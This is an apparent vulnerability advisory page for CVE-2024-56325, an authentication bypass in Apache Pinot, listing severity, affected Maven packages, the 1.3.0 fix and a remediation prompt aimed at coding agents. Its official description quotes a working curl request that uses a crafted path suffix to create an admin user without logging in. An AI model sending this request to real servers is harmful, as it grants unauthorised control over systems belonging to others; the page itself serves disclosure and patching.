# CVE-2024-56325: Apache Pinot: Authentication bypass issue. If the path does not contain / and contain . authentication is not required

> Attackers can bypass authentication by crafting specific paths to create admin users, gaining full control over the Apache Pinot server.

- **Severity:** Critical 9.8 (`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`)
- **Exploited in the wild:** Not known
- **Login needed:** Not needed
- **Attackable:** Over the internet
- **Victim action needed:** Not needed
- **Fix available:** Yes
- **Published:** 1 Apr 2025
- **Updated:** 27 Oct 2025
- **Also known as:** GHSA-6jwp-4wvj-6597

## What is CVE-2024-56325?

CVE-2024-56325 is a critical authentication bypass vulnerability in Apache Pinot, published on 1 Apr 2025. An attacker can exploit it over the internet without logging in, with no action from the victim.

### Official description

Authentication Bypass Issue

If the path does not contain / and contain., authentication is not required.

Expected Normal Request and Response Example

curl -X POST -H "Content-Type: application/json" -d {\"username\":\"hack2\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}  http://{server_ip}:9000/users 

Return: {"code":401,"error":"HTTP 401 Unauthorized"}

Malicious Request and Response Example 

curl -X POST -H "Content-Type: application/json" -d '{\"username\":\"hack\",\"password\":\"hack\",\"component\":\"CONTROLLER\",\"role\":\"ADMIN\",\"tables\":[],\"permissions\":[],\"usernameWithComponent\":\"hack_CONTROLLER\"}'  http://{serverip}:9000/users; http://{serverip}:9000/users; .

Return: {"users":{}}

 

A new user gets added bypassing authentication, enabling the user to control Pinot.

Weakness: CWE-288 (Authentication Bypass Using an Alternate Path or Channel)

## Which versions are affected by CVE-2024-56325?

6 open source packages ship an affected version, including org.apache.pinot:pinot-broker, org.apache.pinot:pinot-common and org.apache.pinot:pinot-controller. It affects 1 product.


| Package | Ecosystem | Affected | Fixed in |
| --- | --- | --- | --- |
| `org.apache.pinot:pinot-broker` | Maven | From 0.8.0 | 1.3.0 |
| `org.apache.pinot:pinot-broker` | Maven | From 0.8.0 | 1.3.0 |
| `org.apache.pinot:pinot-common` | Maven | From 0.8.0 | 1.3.0 |
| `org.apache.pinot:pinot-common` | Maven | From 0.8.0 | 1.3.0 |
| `org.apache.pinot:pinot-controller` | Maven | From 0.8.0 | 1.3.0 |
| `org.apache.pinot:pinot-controller` | Maven | From 0.8.0 | 1.3.0 |

Products: Apache Pinot.

## How do I fix CVE-2024-56325?

Upgrade org.apache.pinot:pinot-broker to 1.3.0 or later.

## Is CVE-2024-56325 being exploited?

It is not confirmed as exploited in the wild, but public exploit code for CVE-2024-56325 exists.

Public exploit code:

- Apache Pinot < 1.3.0 - Authentication Bypass (nuclei): http/cves/2024/CVE-2024-56325.yaml

## Other vulnerabilities in Apache Pinot

- [CVE-2022-26112](https://insights.sbomify.com/CVE-2022-26112/): Apache Pinot has Groovy Function support enabled by default (critical 9.8)
- [CVE-2024-39676](https://insights.sbomify.com/CVE-2024-39676/): Apache Pinot: Unauthorized endpoint exposed sensitive information (high 7.5)
- [CVE-2022-23974](https://insights.sbomify.com/CVE-2022-23974/): Pinot segment push endpoint has a vulnerability in unprotected environments (high 7.5)

## Fix prompt for AI coding agents

```text
Check this codebase for CVE-2024-56325 and fix it if it is affected.

What it is: CVE-2024-56325 is a critical authentication bypass vulnerability in Apache Pinot, published on 1 Apr 2025. An attacker can exploit it over the internet without logging in, with no action from the victim.
Exploitation: It is not confirmed as exploited in the wild, but public exploit code for CVE-2024-56325 exists.

Affected packages and fixed versions:
- org.apache.pinot:pinot-broker (Maven): affected from 0.8.0; fixed in 1.3.0
- org.apache.pinot:pinot-broker (Maven): affected from 0.8.0; fixed in 1.3.0
- org.apache.pinot:pinot-common (Maven): affected from 0.8.0; fixed in 1.3.0
- org.apache.pinot:pinot-common (Maven): affected from 0.8.0; fixed in 1.3.0
- org.apache.pinot:pinot-controller (Maven): affected from 0.8.0; fixed in 1.3.0
- org.apache.pinot:pinot-controller (Maven): affected from 0.8.0; fixed in 1.3.0

Task:
1. Search the dependency manifests and lockfiles (for example package.json, package-lock.json, requirements.txt, poetry.lock, uv.lock, pom.xml, build.gradle, go.mod, Cargo.lock, Gemfile.lock) and any Dockerfiles for the affected packages, including transitive dependencies.
2. If an affected version is in use, upgrade it to the fixed version for its release line with the project's package manager, so the lockfile is regenerated. Prefer the smallest upgrade that fixes it.
3. If there is no fix, or the upgrade would break the build, do not guess: explain the risk and the safest workaround instead.
4. Run the tests and summarise what changed and why.
5. If nothing in the project is affected, say so and change nothing.

Reference: https://insights.sbomify.com/CVE-2024-56325/ (Markdown: https://insights.sbomify.com/CVE-2024-56325/index.md)
```

## Sources

- CVE record: https://www.cve.org/CVERecord?id=CVE-2024-56325
- NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-56325
- OSV: https://osv.dev/vulnerability/CVE-2024-56325

---
From sbomify Insights: https://insights.sbomify.com/CVE-2024-56325/
Summaries are generated and may contain mistakes; the official description above is the record.
